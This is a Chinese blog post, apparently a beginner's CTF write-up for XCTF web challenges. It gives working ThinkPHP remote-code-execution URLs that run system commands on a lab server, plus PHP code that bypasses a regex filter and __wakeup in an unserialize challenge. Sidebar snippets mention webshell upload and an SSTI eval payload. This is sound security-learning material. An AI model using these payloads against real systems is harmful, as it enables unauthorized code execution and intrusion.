Web攻防世界(四)

最新推荐文章于 2023-07-29 10:17:13 发布
最新推荐文章于 2023-07-29 10:17:13 发布
阅读量159 收藏
点赞数
分类专栏: web学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vi_vids/article/details/109188678
版权

CTF-Web

Web方向(攻防世界——找FLAG)

前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第四天)

php_rce

通过链接查看题目

之前看《web安全攻防》第一章有提及Thinkphp存在远程执行漏洞(Getshell)
在这里插入图片描述

利用find函数

http://220.249.52.133:39404/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20flag

利用cat函数

http://220.249.52.133:39404/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

Web_php_unserialize

本题使用正则表达式对传参进行监控
在这里插入图片描述

4663.png#pic_center)

精简代码为:

<?php 
    class Demo { 
        private $file = 'fl4g.php';//$file改成fl4g.php
    }
    $a= serialize(new demo);
    $a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
    $a= str_replace(':1:', ':2:',$a);//绕过wakeup
    echo base64_encode($a);
    ?>

在这里插入图片描述
即可得到flag
在这里插入图片描述

Vi_vids
关注
专栏目录
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3607
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界(web篇)---warmup
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-30 1530
攻防世界—warmup 文章目录攻防世界---warmup题目 php代码审计用到的php知识highlight_file(__FILE__) 题目 php代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php
攻防世界新手区WEB方向解题4
m0_53422950的博客
12-17 197
cookie 题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗?’ 题目场景: http://220.249.52.134:30076 打开场景,可以看到 在通过题目的cookie,可以知道题目的线索在cookie上,于是我们查看该网页的cookie 有两种方式可以查看,我们可以打开浏览器的设置(我用的IE,其他浏览器也差不多) 查看所有cookie和所有站点数据,找到该网址的cookie 打开可发现提示look here:cookie.php,看到php,我们在
攻防世界】学习记录-web(系数4)
龟速更新的九某人
10-12 1518
攻防世界】学习记录-web(系数4) 0072 Cat 0097 Confusion1 0223 FlatScience 0992 题目名称-文件包含
攻防世界 web backup
shidonghang的博客
10-25 1520
backup 题目 场景 过程 访问index.php的备份文件,弹出下载框 使用Notepad打开下载的备份文件
Web攻防世界(二)
Vi_vids的博客
10-16 253
CTF-Web Web方向(攻防世界——找FLAG) 前期在bilibili学习Web知识、基本漏洞原理、burp的用法…(菜鸟第二天) simple_php 该题目为一段php代码 采用的是GET请求方式,所以在URL后面添加/?a=’’&b=2345h,即可得到flag get_post HTTP协议常用的请求方式有两种:GET和POST GET请求方式就是在查看源码后获得的变量直接在URL上赋值 而POST请求方式则不可以这样 在本题中考察两种方法的使用 backup 查找index.php
Web攻防世界(六)
Vi_vids的博客
11-09 161
CTF-Web Web方向(攻防世界——找FLAG) 前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第六天)前阵子一些事情耽搁了,补回来补回来!!! supersqli show tables; show 判断注入点 单引号发现存在sql注入,报错信息得出:数据库类型为MariaDB 判断属性个数 使用order by语句 属性列数为2 存在过滤 过滤了select、update、delete、drop、insert、where关键字 接下来就要考虑绕
攻防世界easy_web之SSTI注入
m0_66935689的博客
07-29 256
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1328
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
5020-微信小程序基于JAVA微信点餐小程序设计+ssm(源码+数据库+lun文).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
基于 Flask 的数字猜谜系统.zip
09-15
该项目是一个基于 Flask 框架的数字猜谜游戏。通过 Flask 搭建了一个 Web 应用,用户可以通过界面参与数字猜谜游戏。项目简单易懂,适合初学者了解 Flask 框架的基本使用以及 Web 开发的基础知识。同时,该项目也有一定的娱乐性质,可以提供给用户休闲娱乐的时光。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看ReaDME.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
5206-微信小程序投票评选系统的设计与实现ssm(源码+数据库+lun文).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
PeaZip 64 bit 9.9.1 free 解压缩工具 杜绝360垃圾
最新发布
09-15
PeaZip 64 bit 9.9.1 free 解压缩工具 杜绝360垃圾
vit_keras-0.0.12-py3-none-any.whl
09-15
该资源为vit_keras-0.0.12-py3-none-any.whl,欢迎下载使用哦!
5272-微信小程序微信智能招聘小程序设计+ssm(源码+数据库+lun文).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
1.Ansible 自动化运维实战笔记.xmind分享给需要的同学
09-15
1.Ansible 自动化运维实战笔记.xmind分享给需要的同学
bacpypes-0.15.0-py3-none-any.whl
09-15
bacpypes-0.15.0-py3-none-any.whl
人工智能大作业-无人机图像目标检测基于python源代码+文档说明+数据集.zip
09-15
人工智能大作业-无人机图像目标检测基于python源代码+文档说明+数据集.zip,含有代码注释,满分大作业资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 人工智能大作业-无人机图像目标检测基于python源代码+文档说明+数据集.zip,含有代码注释,满分大作业资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 人工智能大作业-无人机图像目标检测基于python源代码+文档说明+数据集.zip,含有代码注释,满分大作业资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 人工智能大作业-无人机图像目标检测基于python源代码。
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值